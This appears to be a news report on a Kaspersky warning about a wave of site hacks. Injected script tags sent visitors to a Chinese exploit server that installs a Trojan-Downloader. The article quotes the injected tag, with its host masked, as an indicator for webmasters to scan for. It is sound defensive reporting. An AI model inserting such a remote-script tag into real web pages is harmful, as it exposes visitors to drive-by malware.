14 DAY TRIAL // Security vendor Kaspersky Labs warns that between 2,000 and 10,000 American and Western European web pages have been hacked in a two-day interval. The cybercriminals responsible for the attack have not been identified yet, but the details of the incident are highly similar to an attack that took place last spring and eventually resulted in over 1.5 million pages being compromised.
The affected pages have been injected with code that loads a malicious JavaScript file from remote servers. According to the analysis, a tag that looks like <script src=http://******/h.js> is being added to the websites by the attackers. The .js file is hosted on at least six different servers and when loaded by the browsers, it redirects the users to an attack server which serves multiple exploits.
The attack server is located in China and attempts to exploit several vulnerabilities in well known software applications like Adobe Flash Player, Internet Explorer, Firefox or Windows Media Encoder. If exploited successfully, a Trojan-Downloader application, identified by Kaspersky as Trojan-Downloader.Win32.Hah.a, is being installed on the compromised systems.
As the name implies, this malicious application is capable of downloading and installing other malware, which is defined in a configuration file hosted on the server. This includes several Trojans with spying and data stealing capabilities, some of which are even capable of neutralizing well known anti-virus products in order to prevent detection.
“We’re still working on determining exactly how the sites were hacked, but there are two scenarios which are the most likely – using SQL injection or using accounts to the sites which had already been stolen,” writes Aleks Gostev, Senior Virus Analyst at Kaspersky, on the company's weblog. He also points out that a common pattern for most of the affected websites is that they run on an ASP engine and he urges webmasters that run websites with such a setup to scan their pages for the malicious tag.
Even if this attack is currently incomparable in scale to the one that occurred earlier this year, the situation could easily escalate. “Things are still developing, and the similar nature of the malicious programs used in both attacks lead us to think that this new wave of attacks is potentially pretty serious,” warns Mr. Gostev.